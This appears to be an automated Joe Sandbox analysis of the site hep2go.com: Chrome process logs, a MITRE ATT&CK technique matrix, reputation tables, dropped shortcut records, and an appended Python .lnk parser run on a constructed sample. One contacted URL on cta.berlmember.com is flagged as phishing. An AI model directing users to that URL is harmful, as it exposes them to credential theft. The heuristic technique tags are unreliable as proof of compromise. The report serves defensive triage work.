Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,18123290374646496901,1641604594129139991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hep2go.com"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,18123290374646496901,1641604594129139991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MITRE ATT&CK matrix (a number in parentheses is the count badge the report shows next to that technique):

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | Registry Run Keys / Startup Folder (1) | Process Injection (1) | Masquerading (1) | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder (1) | Process Injection (1) | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Non-Application Layer Protocol (4) | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Extra Window Memory Injection (1) | Obfuscated Files or Information (1) | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (5) | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Extra Window Memory Injection (1) | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Ingress Tool Transfer (3) | Traffic Duplication | Data Destruction |

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://hep2go.com | 0% | Avira URL Cloud | safe | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://www.hep2go.com/include/obj.js | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/javascript/jquery-1.11.3.min.js | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/images/try-it-out-over-3.jpg | 0% | Avira URL Cloud | safe | |
| http://hep2go.com/ | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/ajax/ur_get_user_name.php | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/ajax/logout_get_id.php?userRef=gciaake | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/javascript/scripts.002.js | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/favicon.ico | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/images/progress.gif | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/images/log-in-index.jpg | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/javascript/user_ref.001.js | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/javascript/cart.001.js | 0% | Avira URL Cloud | safe | |
| https://cta.berlmember.com/google/jquery.php | 100% | Avira URL Cloud | phishing | |
| https://www.hep2go.com/images/sign-up-index.jpg | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/images/arrow_down2.gif | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/images/medium-logos/2022-logo-blue-medium.png | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/buttons/left_buttons/pend_over.jpg | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/javascript/scripts.002.js?rnd=733704651 | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/images/sign-up.jpg | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/images/login.jpg | 0% | Avira URL Cloud | safe | |
| https://www.hep2go.com/ajax/get_users.php | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.google.com | 142.250.74.196 | true | false | | high |
| cta.berlmember.com | 103.52.144.214 | true | false | | high |
| hep2go.com | 174.138.160.75 | true | false | | high |
| www.hep2go.com | unknown | unknown | false | | high |
| 198.187.3.20.in-addr.arpa | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://www.hep2go.com/javascript/scripts.002.js | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/include/obj.js | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/images/arrow_down2.gif | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/ajax/logout_get_id.php?userRef=gciaake | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/ | false | | unknown |
| http://hep2go.com/ | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/javascript/jquery-1.11.3.min.js | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/images/progress.gif | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/images/medium-logos/2022-logo-blue-medium.png | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/images/try-it-out-over-3.jpg | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/buttons/left_buttons/pend_over.jpg | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/log-in-2.php?userRef=gciaake | false | | unknown |
| https://www.hep2go.com/images/log-in-index.jpg | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/ajax/ur_get_user_name.php | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/favicon.ico | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/ajax/get_users.php | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/javascript/user_ref.001.js | false | Avira URL Cloud: safe | unknown |
| https://cta.berlmember.com/google/jquery.php | true | Avira URL Cloud: phishing | unknown |
| https://www.hep2go.com/javascript/scripts.002.js?rnd=733704651 | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/javascript/cart.001.js | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/images/sign-up-index.jpg | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/images/sign-up.jpg | false | Avira URL Cloud: safe | unknown |
| https://www.hep2go.com/images/login.jpg | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 142.250.184.195 | unknown | United States | 15169 | GOOGLEUS | false |
| 1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | true |
| 216.58.206.40 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.186.174 | unknown | United States | 15169 | GOOGLEUS | false |
| 172.217.18.14 | unknown | United States | 15169 | GOOGLEUS | false |
| 173.194.76.84 | unknown | United States | 15169 | GOOGLEUS | false |
| 103.52.144.214 | cta.berlmember.com | Indonesia | 59147 | IDNIC-DRUPADI-AS-IDPTDrupadiPrimaID | false |
| 172.217.18.3 | unknown | United States | 15169 | GOOGLEUS | false |
| 216.58.206.36 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.185.170 | unknown | United States | 15169 | GOOGLEUS | false |
| 239.255.255.250 | unknown | Reserved | unknown | unknown | false |
| 142.250.185.142 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.184.238 | unknown | United States | 15169 | GOOGLEUS | false |
| 142.250.186.72 | unknown | United States | 15169 | GOOGLEUS | false |
| 174.138.160.75 | hep2go.com | United States | 20454 | SSASN2US | false |
| 142.250.74.196 | www.google.com | United States | 15169 | GOOGLEUS | false |
                IP
                192.168.2.16
                192.168.2.4
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1615208
                Start date and time:2025-02-14 16:40:11 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                Sample URL:http://hep2go.com
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • EGA enabled
                Analysis Mode:stream
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal56.win@18/24@15/175
                • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.185.142, 173.194.76.84, 142.250.185.78, 142.250.184.238, 142.250.184.206, 142.250.186.174, 216.58.206.40, 142.250.186.72, 2.19.106.160, 4.175.87.197, 13.107.253.45
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, www.googletagmanager.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com, www.google-analytics.com
• Not all processes were analyzed; the report is missing behavior information
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: http://hep2go.com
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2673
                Entropy (8bit):3.9920554650260085
                Encrypted:false
                SSDEEP:
                MD5:3DB95636355AFFF11FF390F2262081BA
                SHA1:5560F2665D449BD8C7A90FED7EC096F074A9C97D
                SHA-256:8CE8303382E98CF45F4CC9C3367387CD0763140600C87C2DBEE702B8499E7121
                SHA-512:DB9EADE4A1036E38C0859D305B8D8B726F01E68D2BB7E5DCAB8BE0F518BF7F4F7A73759B07AA9DD9C1AE83E9BFF3783BE5EBE04F9EA0DD3E005571D054D685CE
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....0...~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2675
                Entropy (8bit):4.007486347016147
                Encrypted:false
                SSDEEP:
                MD5:D8B5987F55FCE7B3CD33BB8BB5603941
                SHA1:41E42F9035B3C51E19915AA18EBEA2FC1FD6F7CD
                SHA-256:97D72A4D3958FCEB64FEC0F954706ABC2EE5725D85F14E3B912AC4DA0BBAF1A0
                SHA-512:08AA134EDE9491F342B58DFBBDC7D5347CDE489654D29F9BBE16F9DAD09446794E81737C1EF967664B0FEB4AB7D007B60961FD1B4E673A08BD1A315EDD46A534
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,......}..~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2689
                Entropy (8bit):4.01401607773186
                Encrypted:false
                SSDEEP:
                MD5:36B9F4BF0BAF5D48C51AE7D3D104CE4D
                SHA1:9F2D5E956655E467DFE2AADAC5729B14E8A0B991
                SHA-256:3AEF2DA56872009BB36CCB74AD8E847C13AE4C25753D6179D6A56A0E850C213B
                SHA-512:C1476A2C6BB1DD923352D9491B55B54DACBA6F19DAE50F7ECDD259D7F0ABCB4A6AA95E5C7CC36D72CD2E3DE7FDD0AD073BB0CB598370DB68C5EA4A449495530F
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):4.001678277348366
                Encrypted:false
                SSDEEP:
                MD5:3ECA2F86EEBF47C09F3955079187DB55
                SHA1:254E70CD970168755DE87A3F381EE43845EFCDD2
                SHA-256:E0E66C02E7A8B049F01DAB89A4701B858E047CAAAAC6F6CB6726A0A9808716DC
                SHA-512:BA8E65C54809769A79888DFC5C8A5B2E693FBB174F0F342EF5472CB2AC92320BDF2C6874BEA2B2E71E1DDD25FBEBD1739EF61237CF9A2DCA4C74E2BD863D8D6F
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,......x..~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2677
                Entropy (8bit):3.9917232354660204
                Encrypted:false
                SSDEEP:
                MD5:F7C0B7C4E9FF5302B80D58539B8BBCAB
                SHA1:FF80ED466807243BB0256A1F93CC7BFB00F1DD19
                SHA-256:59F8749569C513D22010188FB87920D8931A51D6EF168A0D01F4897B6BE0EB69
                SHA-512:000DD30BF6FE96F17A00A8CEC52C8BE4993D5449D35BE5B90737E1FD37CD323D12AEAB28C443B8C33DC0EBD0A6C8E83D06397202CC69D4A8DE637B0C3D9B34D1
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,........~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Feb 14 14:40:49 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                Category:dropped
                Size (bytes):2679
                Entropy (8bit):4.0021265981062495
                Encrypted:false
                SSDEEP:
                MD5:26F3A427A04A4BCFBBF171B093C0EA74
                SHA1:5ABB7B8369EEAA8F5BB971416F3D13DA7F651BC3
                SHA-256:D7F8448CF7B0FA923E24A55D5CFFB7D8FF5A54D88CCCDE45093F7C155B12A8AD
                SHA-512:B776E65F78F8EB68A694B0E51C988CB5FE175E6F13D016D0216C7268D38AA6E2B83F168F7785B068544F0DE2BAED205CC0BD9E00D0922BB97531653E1EAEC24A
                Malicious:false
                Reputation:unknown
                Preview:L..................F.@.. ...$+.,......m..~..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.INZ.}....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VNZ.}....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VNZ.}....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VNZ.}..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VNZ.}...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............../.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
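The five records above are Windows shortcut (.lnk) files that Chrome wrote during the run; the `file` signature line gives the target length (1210144), timestamps and the fact that command-line arguments are present, but the hex preview is cut off before the string data. The reader below is an added example, not Joe Sandbox code: it parses the ShellLinkHeader, skips the shell item ID list, pulls the LocalBasePath out of LinkInfo and decodes the StringData section, which is where the working directory and arguments of a shortcut live. Because the report does not show the real bytes, `make_sample_lnk()` builds a constructed shortcut for the parser to run on; only the target path, working directory, length and mtime are taken from the records above, and the argument string is a placeholder.

```python
"""Minimal MS-SHLLINK (.lnk) reader for triaging dropped shortcuts.

Added example, not Joe Sandbox code.  make_sample_lnk() builds a
constructed shortcut: target, working directory, length and mtime match
the records above; the argument string is a placeholder because the
report does not show the real one.
"""
import struct
from datetime import datetime, timedelta, timezone

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
LINK_FLAGS = {
    "HasLinkTargetIDList": 0x01, "HasLinkInfo": 0x02, "HasName": 0x04,
    "HasRelativePath": 0x08, "HasWorkingDir": 0x10, "HasArguments": 0x20,
    "HasIconLocation": 0x40, "IsUnicode": 0x80,
}
STRING_DATA_ORDER = ("HasName", "HasRelativePath", "HasWorkingDir",
                     "HasArguments", "HasIconLocation")
_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME epoch


def filetime_to_dt(ft):
    return _EPOCH + timedelta(microseconds=ft // 10)


def dt_to_filetime(dt):
    d = dt - _EPOCH  # integer arithmetic: float seconds would lose 100ns ticks
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10


def parse_lnk(data):
    """Return flags, size, mtime, LocalBasePath target and StringData fields."""
    hdr_size, clsid, flags, _attrs, _ct, _at, wt, fsize = struct.unpack_from(
        "<I16sIIQQQI", data, 0)
    if hdr_size != 0x4C or clsid != LINK_CLSID:
        raise ValueError("not a shell link file")
    info = {"flags": [n for n, b in LINK_FLAGS.items() if flags & b],
            "file_size": fsize, "mtime": filetime_to_dt(wt)}
    pos = 0x4C
    if flags & LINK_FLAGS["HasLinkTargetIDList"]:
        (idl_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + idl_size                      # skip the PIDL entirely
    if flags & LINK_FLAGS["HasLinkInfo"]:
        li_size, _li_hdr, li_flags, _vol_off, lbp_off = struct.unpack_from(
            "<IIIII", data, pos)
        if li_flags & 0x1:                       # VolumeIDAndLocalBasePath
            start = pos + lbp_off
            info["target"] = data[start:data.index(b"\0", start)].decode("cp1252")
        pos += li_size
    wide = bool(flags & LINK_FLAGS["IsUnicode"])
    for name in STRING_DATA_ORDER:               # fixed order per MS-SHLLINK
        if flags & LINK_FLAGS[name]:
            (count,) = struct.unpack_from("<H", data, pos)
            pos += 2
            raw = data[pos:pos + (count * 2 if wide else count)]
            pos += len(raw)
            info[name] = raw.decode("utf-16-le" if wide else "cp1252")
    return info


def make_sample_lnk(target, workdir, args, file_size, mtime):
    """Constructed .lnk: header + empty ID list + LinkInfo + two StringData items."""
    flags = (LINK_FLAGS["HasLinkTargetIDList"] | LINK_FLAGS["HasLinkInfo"]
             | LINK_FLAGS["HasWorkingDir"] | LINK_FLAGS["HasArguments"]
             | LINK_FLAGS["IsUnicode"])
    ft = dt_to_filetime(mtime)
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LINK_CLSID, flags,
                         0x20, ft, ft, ft, file_size, 0, 1, 0, 0, 0, 0)
    idlist = struct.pack("<H", 2) + b"\0\0"      # ID list holding only the TerminalID
    volume = struct.pack("<IIII", 0x11, 3, 0x12345678, 0x10) + b"\0"  # fixed drive, empty label
    base_path = target.encode("cp1252") + b"\0"
    body = volume + base_path + b"\0"            # VolumeID, LocalBasePath, empty CommonPathSuffix
    link_info = struct.pack("<IIIIIII", 28 + len(body), 28, 0x1, 28,
                            28 + len(volume), 0,
                            28 + len(volume) + len(base_path)) + body

    def sdata(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + idlist + link_info + sdata(workdir) + sdata(args)


def triage_sample():
    """Parse the constructed shortcut and return the fields a triage note needs."""
    lnk = make_sample_lnk(
        r"C:\Program Files\Google\Chrome\Application\chrome_proxy.exe",
        r"C:\Program Files\Google\Chrome\Application",
        "--placeholder-argument",                # constructed, not from the report
        1210144,
        datetime(2025, 2, 14, 14, 40, 49, tzinfo=timezone.utc))
    return parse_lnk(lnk)


if __name__ == "__main__":
    for key, value in triage_sample().items():
        print(f"{key}: {value}")
```

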